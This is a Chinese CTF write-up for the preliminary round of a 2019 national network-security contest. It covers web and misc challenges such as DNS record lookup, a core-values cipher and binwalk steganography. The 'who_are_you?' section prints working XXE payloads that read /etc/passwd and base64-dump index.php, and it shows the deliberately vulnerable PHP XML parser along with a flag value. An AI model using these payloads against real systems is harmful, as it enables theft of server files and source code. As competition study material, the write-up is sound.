2019-网络与信息安全领域专项赛-初赛_WriteUP

比赛相关信息

赛事全名：第四届中国创新挑战赛暨中关村第三届新兴领域专题赛网络与信息安全专项赛

赛事级别：全国赛

主办单位：国家科技部(指导)、科技部火炬中心、中关村管委会、国家国防科技工业局信息中心

技术支撑：北京永信至诚科技股份有限公司

赛事官网： http://www.net-inf-sec.cn/contest.html

题目仓库：Github

WEB

Game

mark

直接摇摇乐\~一摇就摇出来了\~

who_are_you?

发现原题:https://xz.aliyun.com/t/4616

关键代码：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY doc SYSTEM 'file:///etc/passwd'> ]>
<feedback>
<author>&doc;</author>
<email>we don't care</email>
<content>undefined</content>
</feedback>

<?php
    libxml_disable_entity_loader(false);
    $data = @file_get_contents('php://input');
    $resp = '';
    //$flag='flag{e6970538-d09d-4d2f-98d9-bcc79dd15133}';
    if($data != false){
        $dom = new DOMDocument();
        $dom->loadXML($data, LIBXML_NOENT);
        ob_start();
        $res  = $dom->textContent;
        $resp = ob_get_contents();
        ob_end_clean();
        if ($res){
            die($res);
        }
    }
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>welcome</title>
    <link rel="stylesheet" href="./style.css">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">

</head>
<body class="contactBody">
<div class="wrapper">
    <div class="title">


    </div>


    <form method="post" class="form">
        <h1 id="title">请输入姓名</h1>
        <br/>
        <br/>
        <br/>
        <input type="text" class="name entry " id="name" name="name" placeholder="Your Name"/>
    </form>
    <button class="submit entry" onclick="func()">Submit</button>

    <div class="shadow"></div>
</div>

</body>
</html>
<script type="text/javascript">
    function play() {
        return false;
    }
    function func() {
        // document.getElementById().value
        var xml = '' +
            '<\?xml version="1.0" encoding="UTF-8"\?>' +
            '<feedback>' +
            '<author>' + document.getElementById('name').value+ '</author>' +
            '</feedback>';
        console.log(xml);
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function () {
            if (xmlhttp.readyState == 4) {
                // console.log(xmlhttp.readyState);
                // console.log(xmlhttp.responseText);
                var res = xmlhttp.responseText;
                document.getElementById('title').textContent = res
            }
        };
        xmlhttp.open("POST", "index.php", true);
        xmlhttp.send(xml);
        return false;
    };
</script>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY doc SYSTEM 'php://filter/convert.base64-encode/resource=index.php'> ]>
<feedback>
<author>&doc;</author>
<email>we don't care</email>
<content>undefined</content>
</feedback>

mark

MISC

签到题

DNS解析记录查询即可~

mark

24word

首先对给出的图片进行OCR文字提取

mark

社会主义核心价值观解密(https://z.duoluosb.com/)

mark

Binwalk扫描图片可以发现藏有压缩包，密码为CodeValues

mark

提取压缩包后可拿到

mark

ps放大图片微信扫描该图片得到flag

2019-网络与信息安全领域专项赛-初赛_WriteUP

于2019年8月22日2019年8月22日由xiaolan发布

比赛相关信息

WEB

Game

who_are_you?

MISC

签到题

24word

1 条评论

大白哥哥 · 2019年12月10日下午2:34

发表评论取消回复

CTF

【转】解释器类型的Pwn题目总结

CTF

【转】Off by Null的前世今生

CTF

【转】Kernel Pwn 学习之路 – 番外

2019-网络与信息安全领域专项赛-初赛_WriteUP

于2019年8月22日2019年8月22日由xiaolan发布

比赛相关信息

WEB

Game

who_are_you?

MISC

签到题

24word

1 条评论

大白哥哥 · 2019年12月10日 下午2:34

发表评论 取消回复

相关文章

CTF

【转】解释器类型的Pwn题目总结

CTF

【转】Off by Null的前世今生

CTF

【转】Kernel Pwn 学习之路 – 番外

大白哥哥 · 2019年12月10日下午2:34

发表评论取消回复